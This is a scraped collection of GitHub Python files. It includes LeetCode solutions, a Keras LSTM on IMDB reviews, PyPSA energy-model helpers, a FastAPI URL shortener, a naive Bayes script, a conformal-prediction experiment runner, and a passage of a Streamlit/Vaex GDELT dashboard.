'lxml')\n\tsearch_results_list = list(search_results_page.find_all(text = title))\n\tif len(search_results_list) > 0:\n\t\treturn True\n\treturn False\n\ndef search_imdb(search_string):\n\tresults_list = []\n\tsearch_string.replace(\" \", \"+\") \n\twith requests.Session() as s:\n\t\tresponse = s.get(\"http://www.imdb.com/find?ref_=nv_sr_fn&q=\" + search_string + \"&s=all\")\n\tpage = BeautifulSoup(response.content, 'lxml')\n\tx = page.find(\"div\", { \"class\" : \"findSection\" })\n\tfor elem in page.find(\"div\", { \"class\" : \"findSection\" }).find_all('td', {\"class\" : 'result_text'}):\n\t\tresults_list.append(elem.text)\n\treturn results_list\n\n\n# Add hulu and other sites later\nif __name__ == '__main__':\n\tprint(scrape_netflix(\"Rogue One: A Star Wars story\"))","repo_name":"vikrumn/entertainment_alerter_app","sub_path":"web_scraper.py","file_name":"web_scraper.py","file_ext":"py","file_size_in_byte":2363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36259815925","text":"class Solution:\n def selfDividingNumbers(self, left: int, right: int) :\n def isSelfDivNum(num):\n helper = list(str(num))\n for i in helper:\n i = int(i)\n if i == 0:\n return False\n if num % i != 0:\n return False\n return True\n\n ret = []\n for i in range(left,right+1):\n if isSelfDivNum(i):\n ret.append(i)\n return ret\n\n\nslu = Solution()\nprint(slu.selfDividingNumbers(1, 22))\n","repo_name":"kefirzhang/algorithms","sub_path":"leetcode/python/easy/p728_selfDividingNumbers.py","file_name":"p728_selfDividingNumbers.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23915876724","text":"\"\"\"\nLeetcode #1431 Kids With the Greatest Number of Candies\n\nGiven the array candies and the integer extraCandies, where candies[i] represents the number of candies that the ith kid has.\n\nFor each kid check if there is a way to distribute extraCandies among the kids such that he or she can have the greatest number of candies among them. Notice that multiple kids can have the greatest number of candies.\n\nExample 1:\nInput: candies = [2,3,5,1,3], extraCandies = 3\nOutput: [true,true,true,false,true] \nExplanation: \nKid 1 has 2 candies and if he or she receives all extra candies (3) will have 5 candies --- the greatest number of candies among the kids. \nKid 2 has 3 candies and if he or she receives at least 2 extra candies will have the greatest number of candies among the kids. \nKid 3 has 5 candies and this is already the greatest number of candies among the kids. \nKid 4 has 1 candy and even if he or she receives all extra candies will only have 4 candies. \nKid 5 has 3 candies and if he or she receives at least 2 extra candies will have the greatest number of candies among the kids. \n\nExample 2:\nInput: candies = [4,2,1,1,2], extraCandies = 1\nOutput: [true,false,false,false,false] \nExplanation: There is only 1 extra candy, therefore only kid 1 will have the greatest number of candies among the kids regardless of who takes the extra candy.\n\nExample 3:\nInput: candies = [12,1,12], extraCandies = 10\nOutput: [true,false,true]\n \n\nConstraints:\n2 <= candies.length <= 100\n1 <= candies[i] <= 100\n1 <= extraCandies <= 50\n\nAlgorithm/DS used: <ALGORITHM USED/DS USED>\n\n<AVERAGE TIME COMPLEXITY> worst case time\n\n<AVERAGE SPACE COMPLEXITY> worst case space\n\n\"\"\"\n\n\nfrom typing import List\n\n\nclass Solution:\n def kidsWithCandies(self, candies: List[int], extraCandies: int) -> List[bool]:\n result = []\n greatest = max(candies)\n for pieces in candies:\n result.append(pieces + extraCandies >= greatest)\n return result\n\n\ndef test_solution():\n s = Solution()\n print(\"Expected result from input [2, 3, 5, 1, 3], 3 is [True, True, True, False, True] and the Actual result is: \" +\n str(s.kidsWithCandies([2, 3, 5, 1, 3], 3)))\n assert s.kidsWithCandies([2, 3, 5, 1, 3], 3) == [\n True, True, True, False, True]\n assert s.kidsWithCandies([4, 2, 1, 1, 2], 1) == [\n True, False, False, False, False]\n assert s.kidsWithCandies([12, 1, 12], 10) == [True, False, True]\n\n\nif __name__ == \"__main__\":\n test_solution()\n","repo_name":"JacksonJW/practice-problems-interview-prep","sub_path":"leetcode/python3/kids_with_the_greatest_number_of_candies.py","file_name":"kids_with_the_greatest_number_of_candies.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30061310799","text":"a = {1: 1, 2: 4, 3: 9, 4: 16, 5: 25, 6: 36}\nb = {5: 49, 8: 64, 9: 81, 10: 100}\n\nfor key,value in b.items():\n if key in a.keys():\n print(\"not possible for key\",key) \n else:\n a[key]=value\n\nprint(a)","repo_name":"Krupal01/python_programs","sub_path":"concat_disc.py","file_name":"concat_disc.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7341347637","text":"from __future__ import print_function\nimport keras\nfrom keras.preprocessing import sequence\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Embedding\nfrom keras.layers import LSTM\nfrom keras.datasets import imdb\nfrom keras.callbacks import LearningRateScheduler\nfrom keras import optimizers\nfrom keras.optimizers import SGD\nimport numpy as np\nmax_features = 20000\nmaxlen = 400 # cut texts after this number of words (among top max_features most common words)\nbatch_size = 100\n\nprint('Loading data...')\n(x_train, y_train), (x_test, y_test) = imdb.load_data(num_words=max_features)\nprint(len(x_train), 'train sequences')\nprint(len(x_test), 'test sequences')\n\nprint('Pad sequences (samples x time)')\nx_train = sequence.pad_sequences(x_train, maxlen=maxlen)\nx_test = sequence.pad_sequences(x_test, maxlen=maxlen)\nprint('x_train shape:', x_train.shape)\nprint('x_test shape:', x_test.shape)\n\nclass LossHistory(keras.callbacks.Callback):\n def on_train_begin(self, logs={}):\n self.losses = []\n\n def on_epoch_end(self, epoch, logs=None):\n self.losses.append(logs.get('acc'))\n\ndef step_decay(initial_rate):\n loss, acc = model.evaluate(x_train, y_train, verbose=0)\n lrate = initial_rate * np.exp(loss)\n return lrate\n\nlrate = LearningRateScheduler(step_decay)\n\nclass LrHistory(keras.callbacks.Callback):\n def on_train_begin(self, logs={}):\n self.losses = []\n self.lr = []\n def on_epoch_begin(self, batch, logs={}):\n self.losses.append(logs.get('loss'))\n self.lr.append(step_decay(initial_rate))\n\n\nprint('Build model...')\nmodel = Sequential()\nmodel.add(Embedding(max_features, 128, input_length= maxlen))\nmodel.add(LSTM(128, dropout= 0.2, return_sequences=True))\nmodel.add(LSTM(64, dropout= 0.2, return_sequences=True))\nmodel.add(LSTM(32, dropout = 0.2))\nmodel.add(Dense(1, activation='sigmoid'))\nepochs = 15\nlrate = 0.01\ndecay = lrate/epochs\nadam = keras.optimizers.Adam(lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.0, amsgrad=False)\nsgd = SGD(lr=lrate, momentum=0.9, decay=decay, nesterov=False)\n# try using different optimizers and different optimizer configs\nmodel.compile(loss='binary_crossentropy',\n optimizer = adam,\n metrics=['accuracy'])\n\nprint('Train...')\nloss, acc = model.evaluate(x_train, y_train, verbose=0)\ninitial_rate = 0.001 / np.exp(loss)\nhistory = LossHistory()\nmodel.fit(x_train, y_train,\n batch_size=batch_size,\n epochs=15,\n validation_data=(x_test, y_test), callbacks=[history])\n\nlen = len(history.losses)\nepoch = np.arange(1, len + 1)\nfor i in range(len):\n print ('epoch: %d, acc: %.4f' % (i + 1, history.losses[i]))\n\nprint(epoch)\nimport matplotlib.pyplot as plt\nplt.plot(epoch, history.losses)\nplt.show()\nscore, acc = model.evaluate(x_test, y_test,\n batch_size=batch_size)\nprint('Test score:', score)\nprint('Test accuracy:', acc) #donexxx","repo_name":"woshiduwei/ECE885_mini2","sub_path":"lstm_imdb_expotential loss rate.py","file_name":"lstm_imdb_expotential loss rate.py","file_ext":"py","file_size_in_byte":2929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71806342248","text":"#判断子序列\nclass Solution(object):\n def isSubsequence(self, s, t):\n list_s = list(s)\n list_t = list(t)\n if len(list_s) == 0:\n return True\n start = 0\n count = 0\n flag = False\n for i in range(len(list_s)):\n for j in range(start, len(list_t)):\n if list_t[j] == list_s[i]:\n flag = True\n start = j+1\n count += 1\n break\n if flag is False or count != len(list_s):\n return False\n return True\n\nsolution = Solution()\nprint(solution.isSubsequence(\"abc\", \"ahbgdc\"))","repo_name":"fnxiang/LeetcodePractice","sub_path":"daily_practice/Dynamic_Planning/Q392.py","file_name":"Q392.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3033164685","text":"import pandas as pd\nimport numpy as np\nimport pyomo.environ as pe\nimport pypsa\nidx = pd.IndexSlice\nimport logging\nlogger = logging.getLogger()\nlogger.setLevel(level=logging.INFO)\n\ndef make_options():\n \"\"\" Returns a dict with options for the model and the solver \"\"\"\n\n options = {\n \"solver\": {\n \"name\": \"cplex\",\n \"options\": {None}\n },\n \"step\": 1,\n \"co2_limit\": 0.,\n }\n\n if options['solver']['name'] == \"gurobi\" or options['solver']['name'] == \"gurobi_persistent\":\n options['solver']['options'] = {\"threads\" : 4,\"method\" : 2,\"crossover\" : 0,\"BarConvTol\": 1.e-4,\"FeasibilityTol\": 1.e-4}\n if options['solver']['name'] == \"cplex\":\n options['solver']['options'] = {\"lpmethod\":4,\"threads\":4,\"simplex tolerances optimality\":1e-5,\"solutiontype\":2}\n \n return options\n\n\ndef annuity(lifetime,discount_rate):\n \"\"\" Returns the annuity factor \"\"\"\n\n if discount_rate == 0.:\n return 1/lifetime\n else:\n return discount_rate/(1. - 1. / (1. + discount_rate)**lifetime)\n \n\ndef prepare_costs(file_name = \"pypsa-eur-sec-30/data/costs/costs.csv\", number_years=1, usd_to_eur=1/1.2, costs_year=2030):\n \"\"\" \n Returns a pd.DataFrame with model-ready asset costs and other parameters \n \n based on: arXiv:1801.05290. \n \"\"\"\n\n costs = pd.read_csv(file_name, index_col=[0,1,2]).sort_index()\n\n #correct units to MW and EUR\n costs.loc[costs.unit.str.contains(\"/kW\"),\"value\"]*=1e3\n costs.loc[costs.unit.str.contains(\"USD\"),\"value\"]*=usd_to_eur\n\n costs = costs.loc[idx[:,costs_year,:],\"value\"].unstack(level=2)\n\n #fill defaults\n costs = costs.fillna({\"CO2 intensity\" : 0,\n \"FOM\" : 0,\n \"VOM\" : 0,\n \"discount rate\" : 0.07,\n \"efficiency\" : 1,\n \"fuel\" : 0,\n \"investment\" : 0,\n \"lifetime\" : 25\n })\n\n #annualise investment costs and add FOM\n costs[\"fixed\"] = [(\n annuity(v[\"lifetime\"],v[\"discount rate\"]) \\\n +v[\"FOM\"]/100.)*v[\"investment\"]*number_years \n for i,v in costs.iterrows()\n ]\n\n return costs\n\ndef extra_functionality(esom,snapshots):\n '''\n Adds extra technical constraints to the standard pypsa formulation. \n\n based on: arXiv:1801.05290.\n '''\n \n def battery_charge_discharge(model):\n return model.link_p_nom[\"DE battery charger\"] == \\\n model.link_p_nom[\"DE battery discharger\"]*esom.links.at[\"DE battery charger\",\"efficiency\"]\n esom.model.battery_charge_discharge = pe.Constraint(rule=battery_charge_discharge)\n \n #ratio between max heat output and max electric output\n nom_r = 1.\n \n #backpressure limit\n c_m = 0.75\n \n #marginal loss for each additional generation of heat\n # c_v = 0.15 # is already applied, see prepare_network: options['chp_parameters']['eta_elec']/options['chp_parameters']['c_v']\n \n #Guarantees heat output and electric output nominal powers are proportional\n def chp_nom_propotion(model):\n return nom_r*esom.links.at[\"DE central CHP electric\",\"efficiency\"]*model.link_p_nom[\"DE central CHP electric\"] == \\\n esom.links.at[\"DE central CHP heat\",\"efficiency\"]*model.link_p_nom[\"DE central CHP heat\"]\n esom.model.chp_nom_propotion = pe.Constraint(rule=chp_nom_propotion)\n\n def chp_nom_propotion1(model):\n return nom_r*esom.links.at[\"DE industry CHP electric\",\"efficiency\"]*model.link_p_nom[\"DE industry CHP electric\"] == \\\n esom.links.at[\"DE industry CHP heat\",\"efficiency\"]*model.link_p_nom[\"DE industry CHP heat\"]\n esom.model.chp_nom_propotion1 = pe.Constraint(rule=chp_nom_propotion1)\n\n #Guarantees c_m p_b1 leq p_g1\n def chp_backpressure(model,snapshot):\n return c_m*esom.links.at[\"DE central CHP heat\",\"efficiency\"]*model.link_p[\"DE central CHP heat\",snapshot] <= \\\n esom.links.at[\"DE central CHP electric\",\"efficiency\"]*model.link_p[\"DE central CHP electric\",snapshot] \n esom.model.chp_backpressure = pe.Constraint(list(snapshots),rule=chp_backpressure) \n\n def chp_backpressure1(model,snapshot):\n return c_m*esom.links.at[\"DE industry CHP heat\",\"efficiency\"]*model.link_p[\"DE industry CHP heat\",snapshot] <= \\\n esom.links.at[\"DE industry CHP electric\",\"efficiency\"]*model.link_p[\"DE industry CHP electric\",snapshot] \n esom.model.chp_backpressure1 = pe.Constraint(list(snapshots),rule=chp_backpressure1) \n\n #Guarantees p_g1 +c_v p_b1 leq p_g1_nom\n def chp_top_iso_fuel_line(model,snapshot):\n return model.link_p[\"DE central CHP heat\",snapshot] + model.link_p[\"DE central CHP electric\",snapshot] <= \\\n model.link_p_nom[\"DE central CHP electric\"]\n esom.model.chp_top_iso_fuel_line = pe.Constraint(list(snapshots),rule=chp_top_iso_fuel_line)\n \n def chp_top_iso_fuel_line1(model,snapshot):\n return model.link_p[\"DE industry CHP heat\",snapshot] + model.link_p[\"DE industry CHP electric\",snapshot] <= \\\n model.link_p_nom[\"DE industry CHP electric\"]\n esom.model.chp_top_iso_fuel_line1 = pe.Constraint(list(snapshots),rule=chp_top_iso_fuel_line1)\n\n\n","repo_name":"lukasnacken/pypsa-sec-mga","sub_path":"scripts/prepare_model.py","file_name":"prepare_model.py","file_ext":"py","file_size_in_byte":5285,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35588725596","text":"def solution(s):\n text = s.split(\" \")\n arr = []\n for word in range(len(text)):\n for idx in range(len(text[word])):\n if idx % 2 == 0:\n # 대문자\n a = text[word][idx].upper()\n arr.append(a)\n\n else:\n # 소문자\n b = text[word][idx].lower()\n arr.append(b)\n arr.append(\".\")\n\n arr = \"\".join(arr)\n arr = arr.replace(\".\", \" \")\n\n return arr[:len(arr) - 1]\n","repo_name":"agilestar8/coding-test-","sub_path":"프로그래머스 lv1/이상한 문자 만들기.py","file_name":"이상한 문자 만들기.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16325439157","text":"from fastapi import FastAPI, APIRouter\r\nfrom fastapi.middleware.cors import CORSMiddleware\r\nfrom fastapi.staticfiles import StaticFiles\r\n\r\nfrom core.settings import connect_to_mongo\r\nfrom app.routers import test, create, redirect, analytics\r\n\r\napp = FastAPI()\r\n\r\napp.mount(\"/static\", StaticFiles(directory=\"static\"), name=\"static\")\r\n\r\n\r\napp.add_middleware(\r\n CORSMiddleware,\r\n allow_origins=[\"*\"],\r\n allow_credentials=True,\r\n allow_methods=[\"*\"],\r\n allow_headers=[\"*\"],\r\n)\r\n\r\n\r\n@app.on_event(\"startup\")\r\nasync def startup_event():\r\n print(\"[START] Starting FastAPI\")\r\n\r\n await connect_to_mongo()\r\n\r\n\r\napp.include_router( test.router )\r\napp.include_router( create.router )\r\napp.include_router( analytics.router )\r\napp.include_router( redirect.router )\r\n","repo_name":"dvsh243/short.it","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9328189709","text":"import csv\nimport random\nimport math\nimport sys\n\ndef loadcsv(filename):\n lines = csv.reader(open(filename, \"r\"))\n dataset = list(lines)\n for i in range(len(dataset)):\n dataset[i] = [float(x) for x in dataset[i]]\n return dataset\n\ndef splitdataset(dataset, splitratio):\n trainsize = int(len(dataset) * splitratio)\n trainset = []\n copy = list(dataset)\n while len(trainset) < trainsize:\n index = random.randrange(len(copy))\n trainset.append(copy.pop(index))\n return [trainset, copy]\n\ndef separatebyclass(dataset):\n separated = {}\n for i in range(len(dataset)):\n vector = dataset[i]\n if vector[-1] not in separated:\n separated[vector[-1]] = []\n separated[vector[-1]].append(vector)\n return separated\n\n\ndef mean(numbers):\n mean = sum(numbers) / float(len(numbers))\n return mean\n\n\ndef stdev(numbers):\n avg = mean(numbers)\n variance = sum([pow(x-avg,2) for x in numbers])/float(len(numbers)-1)\n return math.sqrt(variance)\n\n\ndef summarize(dataset):\n summaries = [(mean(attribute), stdev(attribute)) for attribute in zip(*dataset)]\n del summaries[-1]\n return summaries\n\n\ndef summarizebyclass(dataset):\n separated = separatebyclass(dataset)\n summaries = {}\n for classValue, instances in separated.items():\n summaries[classValue] = summarize(instances)\n return summaries\n\n\ndef calculateProbablity(x, mean, stdev):\n exponent = math.exp(-(math.pow(x - mean, 2) / (2 * math.pow(stdev, 2))))\n probablity = (1 / (math.sqrt(2 * math.pi) * stdev)) * exponent\n return probablity\n\n\ndef calculateClassProbablities(summaries, inputVector):\n probablities = {}\n for classValue, classSummaries in summaries.items():\n probablities[classValue] = 1\n for i in range(len(classSummaries)):\n mean, stdev = classSummaries[i]\n x = inputVector[i]\n probablities[classValue] *= calculateProbablity(x, mean, stdev)\n return probablities\n\n\ndef predict(summaries, inputVector):\n probablities = calculateClassProbablities(summaries,inputVector)\n bestLabel, bestProb = None, -1\n for classValue, probablity in probablities.items():\n if bestLabel is None or probablity > bestProb:\n bestProb = probablity\n bestLabel = classValue \n return bestLabel\n\n\ndef getpredictions(summaries, testSet):\n predictions = []\n for i in range(len(testSet)):\n result = predict(summaries,testSet[i])\n predictions.append(result)\n return predictions\n\n\ndef getaccuracy(testSet, predictions):\n correct = 0\n for x in range(len(testSet)):\n if testSet[x][-1] == predictions[x]:\n correct += 1\n return (correct / float(len(testSet))) * 100.0\n\n\ndef main():\n dataset = loadcsv(\"C:\\\\Users\\\\krijan\\\\Documents\\\\Eclispes\\\\LearningHeart\\\\MedicalData.csv\")\n testset = loadcsv(\"C:\\\\Users\\\\krijan\\\\Documents\\\\Eclispes\\\\LearningHeart\\\\testset.csv\")\n summaries = summarizebyclass(dataset)\n predictions = getpredictions(summaries, testset)\n print(predictions)\n accuracy = getaccuracy(testset,predictions)\n ageset= loadcsv(\"C:\\\\Users\\\\krijan\\\\Documents\\\\Eclispes\\\\LearningHeart\\\\age.csv\")\n print(ageset)\n sbpset = loadcsv(\"C:\\\\Users\\\\krijan\\\\Documents\\\\Eclispes\\\\LearningHeart\\\\sbp.csv\")\n print(sbpset)\n dbpset = loadcsv(\"C:\\\\Users\\\\krijan\\\\Documents\\\\Eclispes\\\\LearningHeart\\\\dbp.csv\")\n print(dbpset)\n cholset = loadcsv(\"C:\\\\Users\\\\krijan\\\\Documents\\\\Eclispes\\\\LearningHeart\\\\chol.csv\")\n print(cholset)\n hao = loadcsv(\"C:\\\\Users\\\\krijan\\\\Documents\\\\Eclispes\\\\LearningHeart\\\\hao.csv\")\n print(hao) \n\nmain()\n","repo_name":"krijanniroula/LearningHearts","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20699849915","text":"\"\"\"Создать игровой инвентарь. Должна быть возможность добавлять в него предметы и удалять предметы из него. Инвентарь должен быть ограничен по весу, каждый предмет имеет свой вес. Вывод предметов должен быть с названием предмета и его весом.\"\"\"\r\n\r\nweight = 0\r\ninventory = {'DragonLore':(6), 'Bread':(0.5), 'Dorogoi Dnevnik...':(0.3),\r\n 'Koshka':(1), 'Butterfly':(0.0)} \r\n\r\nwhile True:\r\n choose = input('''What you want to do?\r\n 1. Add item\r\n 2. Delete item\r\n 3. View inventory\r\n 4. Exit\r\n ''')\r\n weight = sum(inventory.values())\r\n print(weight, '/100', sep='')\r\n \r\n if weight > 100:\r\n print('You are overloaded')\r\n elif choose == '1' and weight < 100:\r\n dweight = int(input('Input weight: '))\r\n weight = weight + dweight\r\n if weight < 100:\r\n inventory[input('Enter a name ')] = dweight\r\n else:\r\n print('Error')\r\n elif choose == '2':\r\n inventory.pop(input('What do you want to delete '))\r\n elif choose == '3':\r\n print(inventory)\r\n elif choose == '4':\r\n break\r\n else:\r\n print(\"Error\")\r\n","repo_name":"GGelios/Tenzor_DZ_4","sub_path":"inventory.py","file_name":"inventory.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13841189258","text":"from all_experiments.prediction import run_pred_experiment, run_age_pred\nfrom all_experiments.cov_shift import run_cov_shift\nfrom all_experiments.model_bias import run_model_bias\nfrom all_experiments.nn_capacity import run_nn_capacity\nfrom all_experiments.toy_plot import plot_toy_example\nfrom datasets.datasets import GaussianDataGenerator, px_model, mu_model, sigma_model\nfrom tqdm import tqdm\nimport numpy as np\nimport utils\nimport config\nimport pandas as pd\nimport logging\nimport os\nimport pdb\n\nlogger = logging.getLogger('SLCP.main')\n\n\nif __name__ == '__main__':\n\n if not os.path.exists(os.path.join(os.getcwd(), 'results')):\n os.mkdir(os.path.join(os.getcwd(), 'results'))\n utils.set_logger(os.path.join('./results', f'history_{config.UtilsParams.experiment}_{config.ConformalParams.k}_{config.ConformalParams.valid_ratio}.log')) \n logger.info('\\n\\n<---------------NEW RUN--------------->')\n\n if config.UtilsParams.experiment == 'prediction':\n logger.info('Running conformal prediction task.')\n dataset_list = [\n # 'simulation_1', \n # 'simulation_2', \n # 'simulation_3', \n # 'star',\n # 'meps_19', \n # 'meps_20', \n # 'meps_21', \n # 'facebook_1', \n # 'facebook_2', \n # 'bio', \n # 'blog_data', \n # 'bike', \n # 'concrete', \n # 'community',\n 'age'\n ]\n model_list = [\n # 'random_forest', \n # 'linear', \n # 'neural_net',\n # 'kde',\n 'age_regr'\n ]\n method_name = [\n 'slcp-knn', \n 'slcp-rbf', \n 'slcp-mean',\n # 'cqr', \n # 'cqr-asy', \n # 'split', \n # 'lacp', \n # 'qr'\n ]\n\n all_cov_rate = np.zeros((len(model_list), len(method_name)))\n all_length = np.zeros((len(model_list), len(method_name)))\n for data in tqdm(dataset_list):\n for i, model in enumerate(model_list):\n for j, method in enumerate(method_name):\n logger.info('~~~~~~~~~~~~~~~~~~~~~~~~~~')\n logger.info(f'Dataset: {data} | Model: {model} | Method: {method}.')\n is_cp = False if method == 'qr' else True\n if data != 'age':\n cov_rate, length = run_pred_experiment(dataset_name=data, \n model_name=model, \n method_name=method, \n random_seed=config.UtilsParams.seed,\n conformal=is_cp)\n else:\n cov_rate, length = run_age_pred(dataset_name=data, \n model_name=model, \n method_name=method, \n random_seed=config.UtilsParams.seed)\n all_cov_rate[i, j] += cov_rate\n all_length[i, j] += length\n logger.info('=======================================================================')\n\n all_cov_rate /= len(dataset_list)\n all_length /= len(dataset_list)\n cov_rate_result = pd.DataFrame(data=all_cov_rate, index=model_list, columns=method_name)\n length_result = pd.DataFrame(data=all_length, index=model_list, columns=method_name)\n cov_rate_result.to_csv(f'./results/cov_rate_plot_{config.ConformalParams.k}_{config.ConformalParams.valid_ratio}.csv')\n length_result.to_csv(f'./results/length_plot_{config.ConformalParams.k}_{config.ConformalParams.valid_ratio}.csv')\n\n if config.UtilsParams.experiment == 'cov_shift':\n logger.info('Running covariate shift experiment.')\n run_cov_shift()\n\n if config.UtilsParams.experiment == 'model_bias':\n logger.info('Running model bias experiment.')\n run_model_bias()\n \n if config.UtilsParams.experiment == 'toy_plot':\n logger.info('Running toy plot experiment.')\n plot_toy_example()\n\n if config.UtilsParams.experiment == 'nn_capacity':\n logger.info('Running NN capacity experiment.')\n dataset = 'simulation_2'\n run_nn_capacity(config.UtilsParams.seed, dataset)\n \n logger.info('Program done!')","repo_name":"aaronhan223/SLCP","sub_path":"SLCP/run_all_experiments.py","file_name":"run_all_experiments.py","file_ext":"py","file_size_in_byte":4898,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"17079072212","text":"from collections import Counter\nfrom operator import itemgetter\nimport datetime\n\nimport streamlit as st\n\nimport numpy as np\n\nimport plotly.express as px\nimport plotly.graph_objects as go\n\nimport vaex\n\nfrom wordcloud import WordCloud\n\nfrom actor_codes import actor_codes\n\n# Turn cache on\nif not vaex.cache.is_on():\n vaex.cache.on()\n\n# Load the data\ndf = vaex.open('/data/gdelt/events_v2_streamlit.hdf5')\ndf = df._future()\n\n# Build up the filter\ndef create_filter(codes, date_min, date_max):\n filter = (df.Actor1Type1Code.isin(codes) |\n df.Actor1Type2Code.isin(codes) |\n df.Actor1Type3Code.isin(codes) |\n df.Actor2Type1Code.isin(codes) |\n df.Actor2Type2Code.isin(codes) |\n df.Actor2Type3Code.isin(codes))\n if date_min is not None:\n filter = filter & (df.Date >= date_min)\n if date_max is not None:\n filter = filter & (df.Date <= date_max)\n\n return filter\n\n\n# Compute all the relevant data\ndef compute_data(filter, binner_resolution, progress_function=None):\n # Filter the data\n dff = df.filter(filter)\n\n ## Aggregators for the global (worldwide trackers)\n aggs_global = {'mean_avg_tone': vaex.agg.mean(dff.AvgTone),\n 'std_avg_tone': vaex.agg.std(dff.AvgTone),\n 'mean_goldstein_scale': vaex.agg.mean(dff.GoldsteinScale),\n 'std_goldstein_scale': vaex.agg.std(dff.GoldsteinScale)}\n\n # Aggregators per country\n aggs_country = {'counts': 'count',\n 'avg_tone_sum': vaex.agg.sum(dff.AvgTone),\n 'goldstein_scale_sum': vaex.agg.sum(dff.GoldsteinScale),\n 'num_articles': vaex.agg.sum(dff.NumArticles),\n 'num_sources': vaex.agg.sum(dff.NumSources)}\n\n # Combine the country results\n aggs_country_combine = {'avg_tone': vaex.agg.sum('avg_tone_sum') / vaex.agg.sum('counts'),\n 'avg_tone': vaex.agg.sum('avg_tone_sum') / vaex.agg.sum('counts'),\n 'goldstein_scale': vaex.agg.sum('goldstein_scale_sum') / vaex.agg.sum('counts'),\n 'num_events': vaex.agg.sum('counts'),\n 'num_articles': vaex.agg.sum('num_articles'),\n 'num_sources': vaex.agg.sum('num_sources')}\n main_tree = vaex.progress.tree(progress_function)\n progress_groupby = main_tree.add(\"groupby\")\n progress_agg = main_tree.add(\"agg\")\n\n\n # Do the main operations, optimized pass over the data\n with progress_groupby:\n # The global single value summary stats\n total_events = dff.count(delay=True)\n avg_stats = dff.mean([dff.AvgTone, dff.GoldsteinScale], delay=True)\n total_stats = dff.sum([dff.NumSources, dff.NumArticles], delay=True)\n\n # Groupby per some time interval to plot the evolution of the tone and goldstein scale\n gdf = dff.groupby(vaex.BinnerTime(dff.Date, resolution=binner_resolution[0]), delay=True)\n\n\n # Groupby per country. There are two country codes (for each actor) so we do this twice and merge the results\n gdfc1 = dff.groupby(dff.Actor1CountryCode, delay=True)\n gdfc2 = dff.groupby(dff.Actor2CountryCode, delay=True)\n\n # Actor names - for the world cloud\n actor_names1 = dff.Actor1Name.value_counts(dropna=True, delay=True)\n actor_names2 = dff.Actor2Name.value_counts(dropna=True, delay=True)\n\n # Execute!\n dff.execute()\n\n # Gather the results of the computational graph\n # Global single value summary stats\n avg_tone, goldstein_scale = avg_stats.get()\n total_sources, total_articles = total_stats.get()\n\n with progress_agg:\n # Stats aggregated temporally\n gdf = gdf.get().agg(aggs_global)\n\n # Stats aggregated per country\n gdfc1 = gdfc1.get().agg(aggs_country)\n gdfc2 = gdfc2.get().agg(aggs_country)\n\n gdfc1.rename('Actor1CountryCode', 'CountryCode');\n gdfc2.rename('Actor2CountryCode', 'CountryCode');\n\n gdfc = vaex.concat((gdfc1, gdfc2))\n\n gdfc = gdfc.groupby('CountryCode').agg(aggs_country_combine)\n gdfc = gdfc.dropna(['CountryCode'])\n\n # Combine the two value counts result - a single dict of actor codes\n actor_names = Counter(actor_names1.get().to_dict()) + Counter(actor_names2.get().to_dict())\n del actor_names['missing']\n actor_names = dict(sorted(actor_names.items(), key = itemgetter(1), reverse = True)[:300])\n\n return avg_tone, goldstein_scale, total_events.get(), total_sources, total_articles, gdf, gdfc, actor_names\n\n\ndef create_line_plot(df, x, y, y_err, ylabel=None):\n '''\n :param df: a Vaex DataFrame\n :param x: an Expression to plot on the X axis\n :param y: an Expression to plot on the Y axis\n :param y_err: an Expression for the error (uncertainty) of the Y axis values\n :param ylabel: The label on the Y axis\n '''\n # Set the hovertemplate style\n hovertemplate = '<br> Date: %{x} <br> Value: %{y:.2f} ±%{customdata:.2f}<extra></extra>'\n\n # The range of the yaxis\n _mean_mm, _std_mm = df[y].minmax(), df[y_err].minmax()\n ylim = np.array([_mean_mm[0] - _std_mm[0], _mean_mm[1] + _std_mm[1]]) * 1.5\n\n # Get the data in a format Plotly accepts\n x = df[x].tolist()\n y = df[y].to_numpy()\n y_err = df[y_err].to_numpy()\n\n # The location of the error line (wrapping upon itself)\n y_err = (y + y_err).tolist() + (y - y_err).tolist()[::-1]\n\n\n # The traces...\n trace_mean = go.Scatter(x=x, y=y, customdata=y_err,\n hovertemplate=hovertemplate,\n showlegend=False)\n\n trace_std = go.Scatter(x=x + x[::-1], y=y_err,\n fill='toself', fillcolor='rgba(0, 100, 80, 0.2)',\n line=go.scatter.Line(width=0),\n hoverinfo='skip',\n showlegend=False)\n # The layout\n layout = go.Layout(xaxis=go.layout.XAxis(title='Date'),\n yaxis=go.layout.YAxis(title=ylabel, range=ylim),\n margin=go.layout.Margin(l=0, r=0, b=0, t=0),\n height=300,\n )\n\n return go.Figure(data=[trace_mean, trace_std], layout=layout)\n\n\ndef create_world_map(df):\n fig = px.choropleth(data_frame=df.to_pandas_df(),\n locations='CountryCode',\n color='avg_tone',\n color_continuous_scale='viridis_r',\n hover_data=['num_events', 'num_articles', 